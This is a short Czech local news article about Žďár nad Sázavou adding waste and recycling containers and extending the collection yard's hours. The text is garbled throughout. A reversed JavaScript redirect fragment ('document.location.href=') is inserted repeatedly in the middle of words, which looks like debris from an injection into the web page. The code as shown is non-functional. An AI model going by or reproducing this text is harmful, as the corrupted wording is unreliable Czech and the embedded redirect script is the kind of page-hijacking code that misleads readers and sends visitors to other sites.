Rainbow page separator

Žďárská radnice zvyšuje počet kontejnerů na odpad

Úterý, 24. února 2015

Třídění odpadu

Žďár nad Sázavou / Dalších pět kontejnerů na papír o objemu 1110 litrů s vrchním vsypáváním bylo umístěno v ulicích Žďáru. Opatření má zjednodušit ukládání rozměrných papírových obalů a kar[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonů, které se čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to povalovaly kolem nádob na odpad. Pokud se ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to me[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toda osvědčí, budou tak vybavena i další místa ve městě.
V souvislosti s odkládáním ostatního rozměrného odpadu kolem kontejnerů byla rovněž prodloužena otevírací doba sběrného dvora, kam ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to předměty patří.
V závěru loňského roku došlo i k rozmístění dalších kontejnerů na použitý textil – nádoby na tržnici, na parkovišti u Tokozu a v Nádražní ulici doplnily kontejnery v ulicích Brodská, Jamborova, Na Úvoze a Vnitřní.
Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos žďárská radnice plánuje taktéž rozšířit množství popelnic na bioodpad, o jejich bezplatné zapůjčení mohou nadále žádat jak majitelé rodinných domů, tak zástupci by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových domů.
Ve městě v nejbližší době přibudou i červené kontejnery společnosti Asekol na drobné elektrozařízení, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to do ulic Na Úvoze, Dolní a na křižovatku ulic Neumannova a Studentská.